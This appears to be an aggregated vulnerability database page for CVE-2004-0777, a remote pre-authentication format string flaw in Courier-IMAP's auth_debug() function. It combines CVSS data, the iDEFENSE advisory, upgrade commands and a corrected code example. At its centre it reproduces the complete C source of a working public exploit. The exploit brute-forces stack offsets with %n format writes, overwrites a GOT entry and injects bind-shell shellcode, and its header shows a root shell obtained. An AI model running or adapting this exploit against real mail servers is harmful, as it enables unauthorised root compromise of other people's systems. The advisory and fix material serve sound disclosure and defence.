CVE-2004-0777
CVSS 7.5
Published: 2004-10-20 00:00:00
Last revised: 2012-04-23 21:29:50

[Original] Format string vulnerability in the auth_debug function in Courier-IMAP 1.6.0 through 2.2.1 and 3.x through 3.0.3, when login debugging (DEBUG_LOGIN) is enabled, allows remote attackers to execute arbitrary code.


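[CNNVD] Courier-IMAP Remote Format String Vulnerability (CNNVD-200410-063)

Courier-IMAP is a popular IMAP/POP3 server.
The auth_debug() function in Courier-IMAP versions 1.6.0 through 2.2.1 and 3.x through 3.0.3 has a format string flaw. A remote attacker can exploit it to execute arbitrary commands on the system with the privileges of the process.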
        

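- CVSS (Base Score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]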

- CWE (Weakness Category)

CWE-134 []

- CPE (Affected Platforms and Products)

cpe:/a:inter7:courier-imap:2.2.1
cpe:/a:inter7:courier-imap:2.1.1
cpe:/a:inter7:courier-imap:2.2.0
cpe:/a:inter7:courier-imap:2.0.0
cpe:/a:inter7:courier-imap:1.7
cpe:/a:inter7:courier-imap:1.6
cpe:/a:inter7:courier-imap:2.1.2
cpe:/a:inter7:courier-imap:2.1

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0777
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0777
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200410-063
(Official data source) CNNVD

- Other Links and Resources

http://xforce.iss.net/xforce/xfdb/17034
(VENDOR_ADVISORY)  XF  courierimap-authdebug-format-string(17034)
http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=131
(UNKNOWN)  IDEFENSE  20040818 Courier-IMAP Remote Format String Vulnerability
http://www.trustix.net/errata/2004/0043/
(UNKNOWN)  TRUSTIX  2004-0043
http://www.securityfocus.com/bid/10976
(UNKNOWN)  BID  10976
http://security.gentoo.org/glsa/glsa-200408-19.xml
(UNKNOWN)  GENTOO  GLSA-200408-19

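- Vulnerability Information

Courier-IMAP Remote Format String Vulnerability
High risk  Format string
2004-10-20 00:00:00 2012-12-07 00:00:00
Remote
Courier-IMAP is a popular IMAP/POP3 server.
The auth_debug() function in Courier-IMAP versions 1.6.0 through 2.2.1 and 3.x through 3.0.3 has a format string flaw. A remote attacker can exploit it to execute arbitrary commands on the system with the privileges of the process.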
        

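- Advisories and Patches

Workaround:
If you cannot install the patch or upgrade immediately, CNNVD recommends the following measure to reduce the threat:
* Edit the /usr/lib/courier-imap/etc/imapd configuration file and set 'DEBUG_LOGIN' to '0'.
Vendor patch:
inter7
------
The vendor has released an upgrade that fixes this security issue. Download Courier IMap 3.0.7 from the vendor's home page:

http://www.courier-mta.org/imap/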

- Vulnerability Information (432)

Courier-IMAP <= 3.0.2-r1 auth_debug() Remote Format String Exploit (EDBID:432)
bsd remote
2004-09-02 Verified
143 ktha
N/A
/*
  courier-imap <= 3.0.2-r1 Remote Format String Vulnerability exploit
  
  Author: ktha at hush dot com
  
  Tested on FreeBSD 4.10-RELEASE with courier-imap-3.0.2
  
  Special thanks goes to andrewg for providing the FreeBSD box.
  
  Greetings: all the guys from irc pulltheplug com and irc netric org
  
  bash-2.05b$ ./sm00ny-courier_imap_fsx
  courier-imap <= 3.0.2-r1 Remote Format String Vulnerability exploit by ktha at hush dot com
  [*] Launching attack against 127.0.0.1:143
  [+] Got current ebp(5100): 0xbfbfb050
  [+] Got possible saved ebp(3281): 0xbfbfe390
  [+] Got possible write on the stack pointer(3293): 0xbfbfe3c0
  [+] Verifying...failed
  [+] Got possible saved ebp(3286): 0xbfbfe3a4
  [+] Got possible write on the stack pointer(3298): 0xbfbfe3d4
  [+] Verifying...failed
  [+] Got possible saved ebp(3287): 0xbfbfe3a8
  [+] Got possible write on the stack pointer(3299): 0xbfbfe3d8
  [+] Verifying...OK
  [+] Building fmt...done
  [+] Building shellcode...done
  [*] Using ret: 0x8057000
  [*] Using got of fprintf(): 0x804fefc
  [*] Checking for shell..
  uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
   
  N.B. 1. ret can be guessed ;)
     2. got, well.. that's a different story, it must be bruteforced
     3. "ce_number" & "se_number" can be set with some default values when running multiple times
  4. shell is usable for aprox 1 min
    
  [ Need a challenge ? ]
  [ Visit http://www.pulltheplug.com ]
  
*/

#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <string.h>
#include <errno.h>
#include <signal.h>
#include <stdio.h>
#include <sys/stat.h>
#include <fcntl.h>

#define BIGBUF 2048

#define IMAP_PORT 143

#define END_BRUTEFORCE_STACK 5500

#define TOP_STACK 0xbfc00000 /* FreeBSD */

#define START_BRUTEFORCE_SAVED_EBP 3000

#define JUNK 9

#define GAP_EBP_ESP 48

#define DUMMY_NUMBER 100


void die(int type, char *message) {
 if(type == 2)
 perror(message);
    else
     fprintf(stderr,"%s\n",message);
 exit(1);
}

int connect_to (char *host, int port){
 struct hostent *h;
 struct sockaddr_in c;
 int sock;

 if ((host == NULL) || (*host == (char) 0))
   die(1, "[-] Invalid hostname");

 if ((c.sin_addr.s_addr = inet_addr (host)) == -1){
   if ((h = gethostbyname (host)) == NULL)
  die(1, "[-] Cannot resolve host");
   memcpy ((char *) &c.sin_addr, (char *) h->h_addr, sizeof (c.sin_addr));
 }
 if ((sock = socket (PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
   die(2,"[-] Error creating socket:");
 c.sin_family = PF_INET;
 c.sin_port = htons (port);
 if (connect (sock, (struct sockaddr *) &c, sizeof (c)) == -1)
   die(2, "[-] Cannot connect: ");
 return sock;
}

void close_socket (int sock){
 shutdown (sock, 2);
 close (sock);
}

char *get_request(char *username, char *password){
 char *request = (char *)malloc(strlen(username)+strlen(password)+20);
 sprintf(request,"1 LOGIN \"%s\" \"%s\"\r\n",username, password);
 return request;
}

void send_data(int sock, char *request){
 int n;
 n = send (sock, request, strlen (request), 0);
 if (n != strlen (request)){
        close_socket (sock);
        die(1, "Error sending request\n");
 }
}


int get_ce_number(char *host, int port){
 int sock;
 int loop;
 char temp[BIGBUF];
 int l,n;
 char username[BIGBUF];
 char password[BIGBUF];
 char *request;
 
 for (loop = END_BRUTEFORCE_STACK;;loop--){
 sock = connect_to(host, port);
 n = recv (sock, temp, sizeof (temp), 0);
 sprintf(password,"sm00ny");
 sprintf(username,"%%%d$p",loop);
 request = get_request(username,password);
 send_data(sock,request);
 memset(temp,0,sizeof(temp));
 n = recv (sock, temp, sizeof (temp), 0);
 close_socket (sock);
 if (n > 0)
  break;
 }
 return loop;
}


int get_se_number(int start, int end, char *host, int port){
 int loop;
 char username[BIGBUF];
 char password[BIGBUF];
 char *request;
 int l,n;
 char temp[BIGBUF];
 int sock;
 if (!start)
 start = START_BRUTEFORCE_SAVED_EBP;
 for (loop = start; loop < end; loop++){
 sock = connect_to(host, port);
 n = recv (sock, temp, sizeof (temp), 0);
 sprintf(password,"sm00ny");
 sprintf(username,"%%%d$n",loop);
 request = get_request(username,password);
 send_data(sock,request);
 memset(temp,0,sizeof(temp));
 n = recv (sock, temp, sizeof (temp), 0);
 close_socket (sock);
 if (n > 0)
  break;
 }
 if (loop == end)
 return -1;
 
 return loop;
}





int verify_se_number(int write, unsigned long addy, int number, char *host, int port){
    char username[BIGBUF];
    char password[BIGBUF];
    char temp[BIGBUF];
    char *request;
    int n, sock;
    
    sock = connect_to(host, port);
    memset(temp,0,sizeof(temp));
    n = recv (sock, temp, sizeof (temp), 0);
    sprintf(password,"sm00ny");
    sprintf(username,"%%%uu%%%u$hn%%%u$hn", (addy & 0xffff) - JUNK, number, write);
    request = get_request(username,password);
    send_data(sock,request);
    memset(temp,0,sizeof(temp));
    n = recv (sock, temp, sizeof (temp), 0);
    close_socket (sock);
    if (n <= 0)
     return 0;
     
    sock = connect_to(host, port);
    memset(temp,0,sizeof(temp));
    n = recv (sock, temp, sizeof (temp), 0);
    sprintf(password,"sm00ny");
    sprintf(username,"%%%u$n%%%u$hn", number, write);
    request = get_request(username,password);
    send_data(sock,request);
    memset(temp,0,sizeof(temp));
    n = recv (sock, temp, sizeof (temp), 0);
    close_socket (sock);
    if (n > 0)
     return 0;
     
    return 1;
}
                                                                            
                                                                            
int *get_format_vector(unsigned long got_addy, unsigned long got, unsigned long ret){
 int i,j,sum,byte;
 int *vec = (int *)malloc(11 * sizeof(int));
 
 sum = JUNK;
 for (i=0; i<2; i++){
 for (j=0; j<2; j++){
  vec[2*(2 * i + j)] = (got_addy & 0xffff) - sum;
  while (vec[2*(2 * i + j)] <= 12)
  vec[2*(2 * i + j)] += 0x10000;
  sum += vec[2*(2 * i + j)];
  
  byte = ((got + 2 * i) >> (16*j)) & 0xffff;
  vec[2*(2 * i + j) + 1] = byte - sum;
  while (vec[2*(2 * i + j) + 1] <= 12)
  vec[2*(2 * i + j) + 1] += 0x10000;
  sum += vec[2*(2 * i + j) + 1];
  got_addy += 2;
 }
 }
 for (i=0; i<2; i++){
 byte = (ret >> (16*i)) & 0xffff;
 vec[8+i] = byte - sum;
 while (vec[8+i] <= 12)
  vec[8+i] += 0x10000;
 sum += vec[8+i];
 }
 
 return vec;
}

char *get_format_string(int *vec, int se_number, int write_number, int got_number){
 char *buf = (char *) malloc(BIGBUF);
 char smallbuf[256];
 int i;
 
 for (i=0; i<4; i++){
 sprintf(smallbuf ,"%%%uu%%%u$hn%%%uu%%%u$hn",vec[2*i],se_number,vec[2*i+1],write_number);
 strcat(buf,smallbuf);
 }
 for (i=0; i<2; i++){
 sprintf(smallbuf,"%%%uu%%%u$hn",vec[8 + i],got_number + i);
 strcat(buf,smallbuf);
 }
 return buf;
}


char *gen_shellcode (int gap){
 int size;
 char *p;
 char shellcode[] =
 /* Thanks ilja */
 "\x31\xc0\x31\xc9\x31\xd2\xb0\x61"
 "\x51\xb1\x06\x51\xb1\x01\x51\xb1"
 "\x02\x51\x8d\x0c\x24\x51\xcd\x80"
 "\xb1\x02\x31\xc9\x51\x51\x51\x80"
 "\xc1\x77\x66\x51\xb5\x02\x66\x51"
 "\x8d\x0c\x24\xb2\x10\x52\x51\x50"
 "\x8d\x0c\x24\x51\x89\xc2\x31\xc0"
 "\xb0\x68\xcd\x80\xb3\x01\x53\x52"
 "\x8d\x0c\x24\x51\x31\xc0\xb0\x6a"
 "\xcd\x80\x31\xc0\x50\x50\x52\x8d"
 "\x0c\x24\x51\x31\xc9\xb0\x1e\xcd"
 "\x80\x89\xc3\x53\x51\x31\xc0\xb0"
 "\x5a\xcd\x80\x41\x53\x51\x31\xc0"
 "\xb0\x5a\xcd\x80\x41\x53\x51\x31"
 "\xc0\xb0\x5a\xcd\x80\x31\xdb\x53"
 "\x68\x6e\x2f\x73\x68\x68\x2f\x2f"
 "\x62\x69\x89\xe3\x31\xc0\x50\x54"
 "\x53\x50\xb0\x3b\xcd\x80\x31\xc0"
 "\xb0\x01\xcd\x80";
                                                                         
 
    size = strlen (shellcode);
 p = (char *) malloc (gap + 1);
 
 /* Some nops ;) */
 memset (p, 0x41, gap);
 
 memcpy (p + gap - size, shellcode, size + 1);
 return p;
}


void root(char *host) {
 fd_set rfds;
    int n;
    int sock;
    char buff[1024];
    
    sock = connect_to(host,30464);
    send(sock,"id;\n",4,0);
    while(1) {
     FD_ZERO(&rfds);
     FD_SET(0, &rfds);
        FD_SET(sock, &rfds);
        if(select(sock+1, &rfds, NULL, NULL, NULL) < 1)
         exit(0);
        if(FD_ISSET(0,&rfds)) {
         if( (n = read(0,buff,sizeof(buff))) < 1)
         exit(0);
         if( send(sock,buff,n,0) != n)
         exit(0);
        }
        if(FD_ISSET(sock,&rfds)) {
         if( (n = recv(sock,buff,sizeof(buff),0)) < 1)
         exit(0);
         write(1,buff,n);
        }
 }
}



main (int argc, char **argv) {
 char *host="127.0.0.1";
 int port = IMAP_PORT;
 int sock;
 
 char *temp1, *temp2;
 char *request;
 int *vec;
 
 int n,ok,i;
 
 unsigned long cur_ebp; // was 5100 on my box
 int ce_number = 0;
 unsigned long saved_ebp; // was 3287 on my box
 int se_number = 0;
 unsigned long write_addy;
 int write_number = 0;
 unsigned long got_addy;
 int got_number = 0;
 
 /* objdump -R /usr/lib/courier-imap/sbin/imaplogin | grep fprintf */
 unsigned long got = 0x0804fefc;
 /* heh.. it's up to you to find this one :P Just use your favourite mathod */
 unsigned long ret = 0x8057000;
  
 if (argc > 1)
  host = argv[1];

 printf("courier-imap <= 3.0.2-r1 Remote Format String Vulnerability exploit by ktha at hush dot com\n");
 
 printf("[*] Launching attack against %s:%d\n",host,port);
 
 if (ce_number == 0)
  ce_number = get_ce_number(host,port);
 cur_ebp = TOP_STACK - 4 * ce_number;
 
 got_number = DUMMY_NUMBER;
 got_addy = cur_ebp + 4 * (got_number - 1);
  
 printf("[+] Got current ebp(%d): %p\n",ce_number,cur_ebp);
 
 do{
  se_number = get_se_number(se_number,ce_number,host,port);
  if (se_number == -1)
  die(1,"[-] Failed to get a saved_ebp !");
  
  saved_ebp = cur_ebp + 4 * (se_number - 1);
  printf("[+] Got possible saved ebp(%d): %p\n",se_number,saved_ebp);
  
  write_addy = GAP_EBP_ESP + saved_ebp;
  write_number = (write_addy - cur_ebp) / 4 + 1;
 printf("[+] Got possible write on the stack pointer(%d): %p\n",write_number,write_addy);
  
  printf("[+] Verifying...");
  ok = verify_se_number(write_number,got_addy,se_number,host,port);
  if (ok)
  printf("OK\n");
  else {
  printf("failed\n");
  se_number++;
  }
 }while (!ok);
 
 printf("[+] Building fmt...");
 vec = get_format_vector(got_addy,got,ret);
 temp1 = get_format_string(vec,se_number,write_number,got_number);
 printf("done\n");
 
 printf("[+] Building shellcode...");
 temp2 = gen_shellcode(800);
 printf("done\n");
 
 printf("[*] Using ret: %p\n",ret);
 printf("[*] Using got of fprintf(): %p\n",got);
 
 request = get_request(temp1,temp2);
 
 sock = connect_to(host, port);
 send_data(sock,request);
 sleep(2);
 close_socket (sock);
 
 printf("[*] Checking for shell..\n");
 root(host);
}

// milw0rm.com [2004-09-02]
		

- Vulnerability Information (F34330)

sm00ny-courier_imap_fsx.c (PacketStormID:F34330)
2004-09-13 00:00:00
ktha  
exploit,remote,imap
freebsd
CVE-2004-0777

courier-imap 3.0.2-r1 and below remote format string vulnerability exploit. Tested on FreeBSD 4.10-RELEASE with courier-imap-3.0.2.

- Vulnerability Information (F34098)

iDEFENSE Security Advisory 2004-08-18.t (PacketStormID:F34098)
2004-08-20 00:00:00
iDefense Labs  idefense.com
advisory,remote,arbitrary,imap
CVE-2004-0777

iDEFENSE Security Advisory 08.18.04 - Remote exploitation of a format string vulnerability in Double Precision Inc.'s, Courier-IMAP daemon allows attackers to execute arbitrary code. The vulnerability specifically exists within the auth_debug() function defined in authlib/debug.c. Versions below 3.0.7 are affected.

Courier-IMAP Remote Format String Vulnerability 

iDEFENSE Security Advisory 08.18.04:


I. BACKGROUND

Courier-IMAP is an IMAP/POP3 mail server popular on sites utilizing
Qmail/Exim/Postfix. More information is available here:

    http://www.courier-mta.org/imap/

II. DESCRIPTION


Remote exploitation of a format string vulnerability in Double Precision
Inc.'s, Courier-IMAP daemon allows attackers to execute arbitrary code.
The vulnerability specifically exists within the auth_debug() function
defined in authlib/debug.c:


    void auth_debug( const char *fmt, va_list ap ) {
        char    buf[DEBUG_MESSAGE_SIZE];
        int     i;
        int     len;

        // print into buffer to be able to replace control and other
        // unwanted chars.
        vsnprintf( buf, DEBUG_MESSAGE_SIZE, fmt, ap );
        len = strlen( buf );

        // replace nonprintable chars by dot
        for( i=0 ; i<len ; i++ )
                if( !isprint(buf[i]) )
                        buf[i] = '.';

        // emit it
        fprintf( stderr, buf );   // <- Format String Vulnerability
        fprintf( stderr, "\n" );
    }

The 'buf' variable utilized in the fprintf() call is attacker-controlled
and can contain format string modifiers allowing an attacker to
manipulate the stack and eventually execute arbitrary code.




III. ANALYSIS

Successful exploitation does not require authentication thereby allowing
any remote attacker to execute arbitrary code under the privileges of
the user that the IMAP daemon runs as. The vulnerable function
auth_debug() is only called if login debugging is enabled requiring that
the 'DEBUG_LOGIN' be set to either '1' or '2' in the imapd configuration 
file.

IV. DETECTION

iDEFENSE has confirmed the existence of this vulnerability in
Courier-IMAP, v2.2.1. It is reported that all versions of Courier-IMAP
from 1.6.0 to 2.2.1 inclusive are vulnerable.


V. WORKAROUND

Disable the login debugging option of Courier-IMAP. This can be
accomplished by setting 'DEBUG_LOGIN' to '0' in the configuration file
usually located at /usr/lib/courier-imap/etc/imapd.


VI. VENDOR RESPONSE

This issue has been resolved in the latest version of Courier IMAP
(v3.0.7). As well, the default setting of 'DEBUG_LOGIN' is '0'.


VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2004-0777 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.



VIII. DISCLOSURE TIMELINE

08/10/2004   Initial vendor contact
08/10/2004   iDEFENSE clients notified
08/11/2004   Initial vendor response
08/18/2004   Public disclosure



IX. CREDIT

An anonymous contributor is credited with discovering this
vulnerability.



X. LEGAL NOTICES

Copyright (c) 2004 iDEFENSE, Inc.
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDEFENSE. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email customerservice@idefense.com for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an as is condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
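
The corrected form of the auth_debug() pattern quoted in the advisory above, as an added example that is neither Courier-IMAP's own patch nor code from the advisory: the message is formatted once with a constant format string and then emitted as data through "%s". The value of DEBUG_MESSAGE_SIZE, the FILE * parameter standing in for stderr, and the debug_printf and log_login_attempt helpers are assumptions made for the demonstration.

```c
#include <ctype.h>
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Assumed value: the advisory does not state DEBUG_MESSAGE_SIZE. */
#define DEBUG_MESSAGE_SIZE 1024

/* Corrected emit path. `out` stands in for stderr so the result can be read back. */
static void auth_debug_fixed(FILE *out, const char *fmt, va_list ap)
{
    char buf[DEBUG_MESSAGE_SIZE];
    size_t i, len;

    /* Single format pass: fmt is a constant chosen by the caller and
       client-supplied strings arrive only as arguments. */
    vsnprintf(buf, sizeof buf, fmt, ap);
    len = strlen(buf);

    /* Replace non-printable characters so CR/LF cannot forge log lines. */
    for (i = 0; i < len; i++)
        if (!isprint((unsigned char)buf[i]))
            buf[i] = '.';

    /* The flawed code called fprintf(stderr, buf), a second format pass over
       client data. Passing buf as the argument of "%s" keeps it as data. */
    fprintf(out, "%s\n", buf);
}

/* Hypothetical variadic front end, named for this example only. */
static void debug_printf(FILE *out, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    auth_debug_fixed(out, fmt, ap);
    va_end(ap);
}

/* Hypothetical caller: logs one login attempt to a temporary file and copies
   the emitted line into dst. Returns the line length, or -1 on error. */
static int log_login_attempt(const char *username, char *dst, size_t dstlen)
{
    FILE *tmp;
    size_t n;

    if (dstlen == 0 || (tmp = tmpfile()) == NULL)
        return -1;
    debug_printf(tmp, "LOGIN: username=%s", username);
    rewind(tmp);
    n = fread(dst, 1, dstlen - 1, tmp);
    dst[n] = '\0';
    fclose(tmp);
    return (int)n;
}

int main(void)
{
    /* Constructed inputs: conversion specifiers, and a CR/LF pair. */
    const char *samples[] = { "%x.%x.%n", "alice\r\nLOGIN: forged" };
    char line[256];
    size_t i;

    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        if (log_login_attempt(samples[i], line, sizeof line) > 0)
            fputs(line, stdout);
    return 0;
}
```

Building with -Wformat -Wformat-security (GCC and Clang) flags calls of the fprintf(stderr, buf) shape at compile time.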


    

- Vulnerability Information

9013
Courier-IMAP debug.c auth_debug() Function Remote Format String
Remote / Network Access, Local / Remote, Context Dependent Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- Vulnerability Description

Courier IMAP contains a flaw that may allow a malicious user to execute arbitrary code. The issue is triggered by a user being able to inject format strings into a 'buf' variable within fprintf(). It is possible that the flaw may allow a remote attacker to execute a format string attack resulting in a loss of confidentiality and/or integrity.

- Timeline

2004-08-18 2004-08-10
2004-08-18 Unknown

- Solution

Upgrade to version 3.0.7 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s): set 'DEBUG_LOGIN' to '0' in the configuration file which is usually located in /usr/lib/courier-imap/etc/imapd.

- References

- Vulnerability Author

Unknown or Incomplete

- Vulnerability Information

Courier-IMAP Remote Format String Vulnerability
Input Validation Error 10976
Yes No
2004-08-18 12:00:00 2009-07-12 06:17:00
An anonymous person disclosed this vulnerability.

- Affected Versions

Inter7 Courier-IMAP 3.0.2 r1
Inter7 Courier-IMAP 3.0.2
Inter7 Courier-IMAP 3.0.1
Inter7 Courier-IMAP 3.0 .0
Inter7 Courier-IMAP 2.2.1
Inter7 Courier-IMAP 2.2 .0
Inter7 Courier-IMAP 2.1.2
Inter7 Courier-IMAP 2.1.1
Inter7 Courier-IMAP 2.1
Inter7 Courier-IMAP 2.0 .0
Inter7 Courier-IMAP 1.7
Inter7 Courier-IMAP 1.6
Double Precision Incorporated Courier-IMAP 3.0.7

- Unaffected Versions

Double Precision Incorporated Courier-IMAP 3.0.7

- Discussion

Courier-IMAP is reported to be susceptible to a remote format string vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied input before using it as the format specifier in a formatted printing function.

Successful exploitation of this issue will allow an attacker to execute arbitrary code on the affected computer with the privileges of the user that the IMAP daemon runs as. This vulnerability is exploitable prior to authentication.

Courier-IMAP versions 1.6.0 through to 2.2.1 are reported vulnerable. Other versions may also be vulnerable.

- Exploit

Exploit code has been provided by ktha <ktha@hush.com>:

- Solution

The vendor has released version 3.0.7 of the software addressing this issue. Users of affected packages are urged to upgrade.

Gentoo has released an advisory (GLSA 200408-19) to address this issue. Please see the referenced advisory for more information. Gentoo users can update their computers by carrying out the following commands:

emerge sync
emerge -pv ">=net-mail/courier-imap-3.0.5"
emerge ">=net-mail/courier-imap-3.0.5"

Please see the referenced Gentoo advisory for more information.

Trustix Linux has released advisory TSL-2004-0043 dealing with this and other issues. Please see the referenced advisory for more information.


Inter7 Courier-IMAP 1.6

Inter7 Courier-IMAP 1.7

Inter7 Courier-IMAP 2.0 .0

Inter7 Courier-IMAP 2.1

Inter7 Courier-IMAP 2.1.1

Inter7 Courier-IMAP 2.1.2

Inter7 Courier-IMAP 2.2 .0

Inter7 Courier-IMAP 2.2.1

Inter7 Courier-IMAP 3.0 .0

Inter7 Courier-IMAP 3.0.1

- References

 

 
